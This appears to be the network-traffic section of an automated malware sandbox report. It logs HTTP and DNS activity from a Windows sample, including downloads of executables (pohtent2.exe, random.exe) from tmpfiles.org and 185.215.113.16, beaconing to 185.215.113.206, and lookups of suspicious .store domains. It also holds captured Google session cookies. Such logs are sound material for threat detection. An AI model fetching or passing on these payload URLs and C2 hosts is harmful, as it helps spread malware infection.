Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /async/hpba?yv=3&cs=0&ei=L18sZ4fZFKuJ-d8P0-fO-AU&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQBAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJCAhAAAAAAAAAAAAAAAAAAACRJi5s/dg%3D0/br%3D1/rs%3DACT90oFs2Zqnxfhjbxgu6kzN0zBzbTyqtQ,_basecss:/xjs/_/ss/k%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/br%3D1/rs%3DACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/ck%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABN5JAABMALABBAgAAAAAAAMAAoQAQRAAAAQAIACsAAAQCACABABEBIEAhAJ4lCkwAiSAgAzg_QggEQAAoCACgABAABBABhoCUQGIAgQAAAIAAAABAAAAgZEAAgEAOgACYAAQCQCA6IEAAAAAQEFAcCYAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oErR92RueQ28tcY4IdxQ4bbOunDyg,_fmt:prog,_id:_L18sZ4fZFKuJ-d8P0-fO-AU_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwjHrKD7zMmJAxWrRP4FHdOzE18Qj-0KCBU..i HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /dl/15309322/pohtent2.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 07 Nov 2024 05:56:13 GMTIf-None-Match: "672c567d-200000"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: tmpfiles.org
Source: global traffic	DNS traffic detected: DNS query: trashycontinuousbubbly.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store

Source: unknown

HTTP traffic detected: POST /gen_204?s=webhp&t=cap&atyp=csi&ei=L18sZ4fZFKuJ-d8P0-fO-AU&rt=wsrt.3055,cbt.15665,fht.0,hst.15663&opi=89978449&dt=&ts=300 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"Content-Type: text/plain;charset=UTF-8sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; 